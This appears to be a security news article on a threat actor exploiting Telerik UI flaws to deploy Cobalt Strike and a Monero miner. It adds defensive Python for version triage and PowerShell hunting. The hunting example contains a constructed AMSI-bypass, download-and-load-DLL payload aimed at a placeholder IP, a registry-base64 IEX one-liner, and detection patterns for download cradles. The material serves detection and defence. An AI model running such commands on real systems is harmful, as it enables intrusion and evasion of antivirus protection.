A threat actor tracked as ‘Blue Mockingbird’ is exploiting Telerik UI flaws to break into servers, install Cobalt Strike beacons, and hijack system resources to mine Monero. The attacker uses CVE-2019-18935, a critical (CVSS v3.1: 9.8) deserialization vulnerability in the Telerik UI framework for ASP.NET AJAX that allows remote code execution.
In May 2020, the same threat actor was seen targeting vulnerable Microsoft IIS servers running Telerik UI, a full year after the vendor had released fixes. Notably, Sophos researchers now report that, according to their detection data, Blue Mockingbird is still exploiting the very same vulnerabilities.
To exploit CVE-2019-18935, attackers must first obtain the encryption keys that protect Telerik UI’s serialized data on the target. This can be done via CVE-2017-11317 and CVE-2017-11357, or by exploiting some other vulnerability in the target web application. Because many web apps simply embedded whatever Telerik UI version was current when they were built and were later abandoned or forgotten, plenty of viable targets remain exposed.
Once the keys are in hand, the attackers compile a malicious DLL carrying the deserialization payload and execute it in the context of the ‘w3wp.exe’ IIS worker process. In the recent attacks observed by Sophos, Blue Mockingbird uses a publicly available proof-of-concept (PoC) exploit that handles the encryption logic and automates the DLL compilation. The payload in the latest attacks was a Cobalt Strike beacon, a legitimate penetration-testing tool built for stealth, which Blue Mockingbird uses to run encoded PowerShell commands.
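A defender triaging an IIS estate for the two preconditions described above (an unpatched Telerik build and encryption keys that were never configured) can do it from two inputs: the file version of Telerik.Web.UI.dll and the site's web.config. The following is an added example written for this page, not code from Sophos, Telerik, or the Blue Mockingbird PoC. The fix thresholds are taken from the CVE records as the editor reads them (R2 2017 SP1 for CVE-2017-11317, R2 2017 SP2 for CVE-2017-11357, and 2020.1.114 as the first release where CVE-2019-18935 is blocked by default); confirm them against Telerik's own advisories before relying on them. The appSettings names are Telerik's documented key settings; the web.config fragment is constructed for the example.

```python
import xml.etree.ElementTree as ET

# Telerik UI for ASP.NET AJAX versions are year.quarter.build[.framework], e.g. 2019.2.514.45.
# Thresholds are the vendor release numbers cited by the CVE records (editor's reading;
# verify against Telerik's advisories). 2019.3.1023 only blocks CVE-2019-18935 with a
# non-default setting, so the default-safe 2020.1.114 is used as the threshold.
FIX_VERSIONS = {
    "CVE-2017-11317": (2017, 2, 621),   # R2 2017 SP1: weak/known RadAsyncUpload encryption key
    "CVE-2017-11357": (2017, 2, 711),   # R2 2017 SP2: RadAsyncUpload arbitrary file upload
    "CVE-2019-18935": (2020, 1, 114),   # deserialization blocked by default from this release
}

# appSettings keys Telerik documents for the RadAsyncUpload/dialog encryption material.
KEY_SETTINGS = (
    "Telerik.AsyncUpload.ConfigurationEncryptionKey",
    "Telerik.Upload.ConfigurationHashKey",
    "Telerik.Web.UI.DialogParametersEncryptionKey",
)

# Constructed web.config fragment for the example: one key set, two never configured.
SAMPLE_WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="SomeUnrelatedSetting" value="1" />
    <add key="Telerik.AsyncUpload.ConfigurationEncryptionKey" value="Rot4te-Me-Pl3ase" />
  </appSettings>
</configuration>
"""


def parse_telerik_version(version: str) -> tuple:
    """Return (year, quarter, build) from a Telerik.Web.UI.dll version string."""
    parts = version.strip().split(".")
    if len(parts) < 3:
        raise ValueError(f"unexpected Telerik version string: {version!r}")
    return tuple(int(p) for p in parts[:3])


def affected_cves(version: str) -> list:
    """CVEs whose fix release is newer than the installed Telerik build."""
    installed = parse_telerik_version(version)
    return sorted(cve for cve, fixed in FIX_VERSIONS.items() if installed < fixed)


def missing_key_settings(web_config_xml: str) -> list:
    """Telerik encryption-key appSettings that are absent or empty in web.config."""
    root = ET.fromstring(web_config_xml)
    configured = {
        el.get("key")
        for el in root.iter("add")
        if el.get("key") in KEY_SETTINGS and (el.get("value") or "").strip()
    }
    return [k for k in KEY_SETTINGS if k not in configured]


def triage(version: str, web_config_xml: str) -> dict:
    """Summarise one site's exposure: unpatched CVEs plus key material never configured."""
    cves = affected_cves(version)
    missing = missing_key_settings(web_config_xml)
    if not cves:
        verdict = "patched"
    elif "CVE-2019-18935" in cves and "CVE-2017-11317" in cves and missing:
        # Deserialization bug present and the build still ships the known default key:
        # the attacker does not even need a separate key-disclosure step.
        verdict = "critical: deserialization reachable with the known default key"
    elif "CVE-2019-18935" in cves:
        verdict = "high: deserialization bug present, exploit requires the configured keys"
    else:
        verdict = "medium: key-disclosure/upload bugs present"
    return {"version": parse_telerik_version(version), "cves": cves,
            "missing_keys": missing, "verdict": verdict}


if __name__ == "__main__":
    for v in ("2017.1.228.45", "2019.2.514.45", "2020.1.114.45"):
        print(v, triage(v, SAMPLE_WEB_CONFIG))
```

The version check alone is not enough: a build between the 2017 fixes and 2020.1.114 is still exploitable by anyone who learns the keys, which is exactly the "other vulnerability in the target web app" path the text mentions, so the triage reports unconfigured keys separately from the CVE list.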
Persistence is achieved through Active Directory Group Policy Objects (GPOs) that create scheduled tasks, which store base64-encoded PowerShell in a new registry entry. To evade Windows Defender, the script uses common AMSI-bypass techniques and then downloads a Cobalt Strike DLL and loads it into memory.
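The persistence chain above leaves a distinctive trail in scheduled-task actions and process command lines: powershell.exe launched with an -EncodedCommand blob, or a one-liner that pulls base64 out of a registry value, decodes it, and runs it. The following hunt logic is an added example for this page (not Sophos's detection and not Blue Mockingbird's script): it extracts the encoded argument, decodes it from UTF-16LE base64, and flags the AMSI-bypass, download and in-memory-load patterns the text describes. The sample command lines and the sample script are constructed for the example, including the documentation-range IP 198.51.100.7.

```python
import base64
import re

# Patterns a decoded payload of the kind described above would contain. The keys are
# report labels; the values are plain regexes over the command line plus decoded script.
INDICATORS = {
    "amsi_bypass": re.compile(r"(?i)amsi(?:utils|initfailed|context|scanbuffer)"),
    "in_memory_load": re.compile(r"(?i)\[(?:System\.)?Reflection\.Assembly\]::Load"),
    "download_cradle": re.compile(r"(?i)\b(?:DownloadString|DownloadData|DownloadFile|Invoke-WebRequest|iwr)\b"),
    "invoke_expression": re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b"),
    "nested_base64": re.compile(r"(?i)FromBase64String"),
    "registry_read": re.compile(r"(?i)(?:Get-ItemProperty|\bgp\b|HK(?:LM|CU):)"),
}

# powershell.exe accepts -EncodedCommand, any unambiguous prefix of it (-e, -en, -enc ...) and -ec.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects it: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded(cmd: str):
    """Return the base64 blob passed to -EncodedCommand (a prefix of it, or -ec), else None."""
    for m in ENCODED_ARG.finditer(cmd):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            return m.group(2)
    return None


def decode_encoded_command(b64: str):
    """Decode an -EncodedCommand argument; None if it is not valid base64 / UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmd: str) -> dict:
    """Decode any encoded payload and list the indicators found in command + payload."""
    result = {"command": cmd, "encoded": False, "decoded": None, "indicators": []}
    b64 = extract_encoded(cmd)
    text = cmd
    if b64 is not None:
        result["encoded"] = True
        text = cmd.replace(b64, "<encoded>")   # do not pattern-match inside the blob itself
        script = decode_encoded_command(b64)
        if script is None:
            result["indicators"].append("undecodable_encoded_command")
        else:
            result["decoded"] = script
            text += "\n" + script
    result["indicators"] += [name for name, rx in INDICATORS.items() if rx.search(text)]
    return result


def hunt(command_lines) -> list:
    """Command lines worth a human look: anything encoded or matching an indicator."""
    return [r for r in map(analyze_command_line, command_lines) if r["indicators"] or r["encoded"]]


# Constructed samples (not from the Sophos report). The first mimics a task running an
# encoded AMSI-bypass-then-load-DLL script; the second pulls base64 out of a registry value
# the way the persistence described above does; the last two are benign admin activity.
SAMPLE_SCRIPT = (
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
    "$b=(New-Object Net.WebClient).DownloadData('http://198.51.100.7/c.dll');"
    "[Reflection.Assembly]::Load($b)"
)
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -W Hidden -Enc " + encode_powershell(SAMPLE_SCRIPT),
    r"powershell.exe -NoP -c IEX([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((Get-ItemProperty 'HKLM:\SOFTWARE\Example').Payload)))",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
    r"C:\Windows\System32\schtasks.exe /Query /TN \Microsoft\Windows\Defrag\ScheduledDefrag",
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_COMMAND_LINES):
        print(hit["indicators"], "<-", hit["command"][:60])
```

Feed it the Actions field from exported scheduled tasks or process-creation command lines (Sysmon event 1, Security 4688 with command-line auditing on); an encoded command that will not decode is reported on its own, since a blob that is neither valid base64 nor UTF-16LE is itself unusual for a legitimate task.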
The second payload (‘crby26td.exe’) is XMRig, a widely used open-source miner for Monero, a cryptocurrency favoured by criminals because it is so hard to trace. Mining was the main objective of the actor’s 2020 campaign as well, so the attack chain, techniques, and goals have changed little.
That said, Cobalt Strike readily enables lateral movement within a compromised network, data exfiltration, account takeover, and the deployment of more damaging payloads such as ransomware. Whether Blue Mockingbird intends to pursue any of those options is unclear; for now, the group remains focused solely on Monero mining.